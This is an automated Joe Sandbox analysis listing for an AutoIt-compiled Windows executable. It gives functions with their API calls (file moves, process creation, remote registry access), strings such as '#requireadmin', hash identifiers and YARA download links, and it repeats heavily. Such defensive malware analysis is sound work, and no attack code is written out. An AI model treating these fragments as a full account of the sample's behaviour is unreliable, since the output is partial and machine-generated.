                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3761583154-0
                                                                                                                              • Opcode ID: 967dfb7bc22f7dc57c393ea22994604df0e2b0884f89cf738b26df40c5187317
                                                                                                                              • Instruction ID: 4c32f1a32e6e822243bc21b960f36f1092bb8ed019ed6ec8109a105f64cb4d7f
                                                                                                                              • Opcode Fuzzy Hash: 967dfb7bc22f7dc57c393ea22994604df0e2b0884f89cf738b26df40c5187317
                                                                                                                              • Instruction Fuzzy Hash: 9F216275600219BF9B109BA9DC98CFF73EDFB093607418525F915DB290DB70EC8187A0
                                                                                                                              Function 001B69F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93filestringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001731B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 001731DA
                                                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 001B6A2B
                                                                                                                              • _wcscmp.LIBCMT ref: 001B6A49
                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 001B6A62
                                                                                                                                • Part of subcall function 001B6D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 001B6DBA
                                                                                                                                • Part of subcall function 001B6D6D: GetLastError.KERNEL32 ref: 001B6DC5
                                                                                                                                • Part of subcall function 001B6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 001B6DD9
                                                                                                                              • _wcscat.LIBCMT ref: 001B6AA4
                                                                                                                              • SHFileOperationW.SHELL32(?), ref: 001B6B0C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                                                                                                                              • String ID: \*.*
                                                                                                                              • API String ID: 2323102230-1173974218
                                                                                                                              • Opcode ID: 6f30e612775e98dc9218d5ed6f79d96b2dccad427fbe8a72ebfb6b42ed5cc908
                                                                                                                              • Instruction ID: 4e81488ed7a2e12b367e16b6a8ead4cdf6696479b9398b1988b573b16f5bf464
                                                                                                                              • Opcode Fuzzy Hash: 6f30e612775e98dc9218d5ed6f79d96b2dccad427fbe8a72ebfb6b42ed5cc908
                                                                                                                              • Instruction Fuzzy Hash: 3D3124B1900219AACF51EFB4E845BDDB7B8AF58300F5045EAF509E3541EB349B89CFA4
                                                                                                                              Function 001B2FCD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __wcsnicmp
                                                                                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                              • API String ID: 1038674560-2734436370
                                                                                                                              • Opcode ID: 5e21a591070e7136ee7dc4de82a84fcf60ecca69acfa4fa1370848067bf5115e
                                                                                                                              • Instruction ID: 799f0dccdd7f787bb7a8524f9de206df5d628ea1f62f0da6dde7ac017173fb90
                                                                                                                              • Opcode Fuzzy Hash: 5e21a591070e7136ee7dc4de82a84fcf60ecca69acfa4fa1370848067bf5115e
                                                                                                                              • Instruction Fuzzy Hash: 21213832205611BAD735BA74DC02EFB73EC9F65310F10412AF895871C2EBA19A92D391
                                                                                                                              Function 001B17C8 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001B180D
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001B1833
                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 001B1836
                                                                                                                              • SysAllocString.OLEAUT32 ref: 001B1857
                                                                                                                              • SysFreeString.OLEAUT32 ref: 001B1860
                                                                                                                              • StringFromGUID2.COMBASE(?,?,00000028), ref: 001B187A
                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 001B1888
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3761583154-0
                                                                                                                              • Opcode ID: 4e5227fc0441be32f596876f108065f34d17cfdf1803db1075c500ff05920508
                                                                                                                              • Instruction ID: b0d8c1f0d76d85d7ed459faf6bbd886cb645c5f772119e2f2d752558ffb7fc13
                                                                                                                              • Opcode Fuzzy Hash: 4e5227fc0441be32f596876f108065f34d17cfdf1803db1075c500ff05920508
                                                                                                                              • Instruction Fuzzy Hash: B4213076604204BF9B109BA8DC89DBE77EDFB093A07918125F915DB6A0DB70EC81CB64
                                                                                                                              Function 001DA0D6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0018C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0018C657
                                                                                                                                • Part of subcall function 0018C619: GetStockObject.GDI32(00000011), ref: 0018C66B
                                                                                                                                • Part of subcall function 0018C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0018C675
                                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 001DA13B
                                                                                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 001DA148
                                                                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 001DA153
                                                                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 001DA162
                                                                                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 001DA16E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                              • String ID: Msctls_Progress32
                                                                                                                              • API String ID: 1025951953-3636473452
                                                                                                                              • Opcode ID: 54b565667baa577ef50948e93324cf847986e375b4c8eb014f37cb15db3ee398
                                                                                                                              • Instruction ID: 932675f07e391897f1899dacd9784c358f44d5442ab3a59b6867cf40fcb5ca2f
                                                                                                                              • Opcode Fuzzy Hash: 54b565667baa577ef50948e93324cf847986e375b4c8eb014f37cb15db3ee398
                                                                                                                              • Instruction Fuzzy Hash: BD11C4B215021DBEEF119F60DC86EEB7F5DEF08798F014215FA08A6190C7769C21DBA0
                                                                                                                              Function 00194C3D Relevance: 10.5, APIs: 7, Instructions: 47threadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • __getptd_noexit.LIBCMT ref: 00194C3E
                                                                                                                                • Part of subcall function 001986B5: GetLastError.KERNEL32(?,00190127,001988A3,00194673,?,?,00190127,?,0017125D,00000058,?,?), ref: 001986B7
                                                                                                                                • Part of subcall function 001986B5: __calloc_crt.LIBCMT ref: 001986D8
                                                                                                                                • Part of subcall function 001986B5: GetCurrentThreadId.KERNEL32 ref: 00198701
                                                                                                                                • Part of subcall function 001986B5: SetLastError.KERNEL32(00000000,00190127,001988A3,00194673,?,?,00190127,?,0017125D,00000058,?,?), ref: 00198719
                                                                                                                              • CloseHandle.KERNEL32(?,?,00194C1D), ref: 00194C52
                                                                                                                              • __freeptd.LIBCMT ref: 00194C59
                                                                                                                              • RtlExitUserThread.NTDLL(00000000,?,00194C1D), ref: 00194C61
                                                                                                                              • GetLastError.KERNEL32(?,?,00194C1D), ref: 00194C91
                                                                                                                              • RtlExitUserThread.NTDLL(00000000,?,?,00194C1D), ref: 00194C98
                                                                                                                              • __freefls@4.LIBCMT ref: 00194CB4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1445074172-0
                                                                                                                              • Opcode ID: 5bc90397e43aa2dacbf9e6e11ee352ab675891efe261ed771759bd94d0caf96e
                                                                                                                              • Instruction ID: 308a4bd464ee4a4c20d58e114adb3f864f9a81979845c1360b8db941df409eed
                                                                                                                              • Opcode Fuzzy Hash: 5bc90397e43aa2dacbf9e6e11ee352ab675891efe261ed771759bd94d0caf96e
                                                                                                                              • Instruction Fuzzy Hash: 9501F274401701AFDF18BB74E909D2D7BA6FF263147148519F9098B652EF35D883CA91
                                                                                                                              Function 001DE13E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 001DE14D
                                                                                                                              • _memset.LIBCMT ref: 001DE15C
                                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00233EE0,00233F24), ref: 001DE18B
                                                                                                                              • CloseHandle.KERNEL32 ref: 001DE19D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset$CloseCreateHandleProcess
                                                                                                                              • String ID: $?#$>#
                                                                                                                              • API String ID: 3277943733-3324046207
                                                                                                                              • Opcode ID: c3e28b74bae600a4a79272d2b5dd30f021f9f27a0a7e7155e08d582951b20a01
                                                                                                                              • Instruction ID: 2fb13f048ac8a07d0128943db96ccbb4e486a49eeab9f96b53671b9fc3d7cd75
                                                                                                                              • Opcode Fuzzy Hash: c3e28b74bae600a4a79272d2b5dd30f021f9f27a0a7e7155e08d582951b20a01
                                                                                                                              • Instruction Fuzzy Hash: ECF0E2F1A50301BFF700AB21BC0AF777AADEB09799F000020BA04D51A2D3B68F5086E4
                                                                                                                              Function 0018C697 Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetClientRect.USER32(?,?), ref: 0018C6C0
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 0018C701
                                                                                                                              • ScreenToClient.USER32(?,000000FF), ref: 0018C729
                                                                                                                              • GetClientRect.USER32(?,?), ref: 0018C856
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 0018C86F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Rect$Client$Window$Screen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1296646539-0
                                                                                                                              • Opcode ID: b989744f4609a5f19bc61394729aae968bde603672a5cd3d5e89b743e16a482d
                                                                                                                              • Instruction ID: 6f278ea8363feec617b09a8d0d04887b95f842e251dd23492f319c7961b9ec6f
                                                                                                                              • Opcode Fuzzy Hash: b989744f4609a5f19bc61394729aae968bde603672a5cd3d5e89b743e16a482d
                                                                                                                              • Instruction Fuzzy Hash: B8B1477990064ADBDB14DFA9C4807EDB7B1FF08710F15912AEC59EB254EB30AA40CFA4
                                                                                                                              Function 001B9569 Relevance: 9.2, APIs: 6, Instructions: 204COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memmove$__itow__swprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3253778849-0
                                                                                                                              • Opcode ID: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                                                                                                                              • Instruction ID: 41bcc6e4d24b56022977596a0a6c3fcc07b3afe94db84fec746b4ce7dcc0fd28
                                                                                                                              • Opcode Fuzzy Hash: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                                                                                                                              • Instruction Fuzzy Hash: 5F619E3050024AAFCF06EF60CC81EFE77B9AF58314F448459F95A6B292EB74E906CB51
                                                                                                                              Function 001D2EC7 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
                                                                                                                                • Part of subcall function 001D3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001D2AA6,?,?), ref: 001D3B0E
                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001D2FA0
                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001D2FE0
                                                                                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 001D3003
                                                                                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 001D302C
                                                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 001D306F
                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 001D307C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4046560759-0
                                                                                                                              • Opcode ID: 04663a17b70e8618cc69c0ce6f70648db6c32ccb9e9ac043814dd956ac9f1c4b
                                                                                                                              • Instruction ID: 3ada27b4de37cadd5e48f19aa38ee75caa0a0d549eecbb21bf911d7d52ad7631
                                                                                                                              • Opcode Fuzzy Hash: 04663a17b70e8618cc69c0ce6f70648db6c32ccb9e9ac043814dd956ac9f1c4b
                                                                                                                              • Instruction Fuzzy Hash: 1E513871108204AFC705EF64C885E6FBBF9BF98704F04891EF595872A1DB71EA45CB52
                                                                                                                              Function 0018DB8C Relevance: 9.2, APIs: 6, Instructions: 160COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _wcscpy$_wcscat
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2037614760-0
                                                                                                                              • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                                                                                              • Instruction ID: a8a93ff33fe56543d74d7d984cd011d0a22262e935078478bb7310a6af2d5f70
                                                                                                                              • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                                                                                              • Instruction Fuzzy Hash: 9C51F230900315AACF15BF99E4419BDB3B1EF15720F50804EF580AB2D2DBB49F82DB91
                                                                                                                              Function 001B2ADC Relevance: 9.2, APIs: 6, Instructions: 158COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • VariantInit.OLEAUT32(?), ref: 001B2AF6
                                                                                                                              • VariantClear.OLEAUT32(00000013), ref: 001B2B68
                                                                                                                              • VariantClear.OLEAUT32(00000000), ref: 001B2BC3
                                                                                                                              • _memmove.LIBCMT ref: 001B2BED
                                                                                                                              • VariantClear.OLEAUT32(?), ref: 001B2C3A
                                                                                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 001B2C68
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1101466143-0
                                                                                                                              • Opcode ID: f7b36d07a50af5aa0b92283051c9a4c3f6bcf1f9be3a11420a9249787d58fb26
                                                                                                                              • Instruction ID: 18ab13b5a41f088e4167ba8a90933ab14a96d609514749c0060049ee20583207
                                                                                                                              • Opcode Fuzzy Hash: f7b36d07a50af5aa0b92283051c9a4c3f6bcf1f9be3a11420a9249787d58fb26
                                                                                                                              • Instruction Fuzzy Hash: 055179B5A00209EFCB14CF58C880EAABBB9FF4C314B158559E959DB310E730EA51CFA0
                                                                                                                              Function 001D82DB Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetMenu.USER32(?), ref: 001D833D
                                                                                                                              • GetMenuItemCount.USER32(00000000), ref: 001D8374
                                                                                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 001D839C
                                                                                                                              • GetMenuItemID.USER32(?,?), ref: 001D840B
                                                                                                                              • GetSubMenu.USER32(?,?), ref: 001D8419
                                                                                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 001D846A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
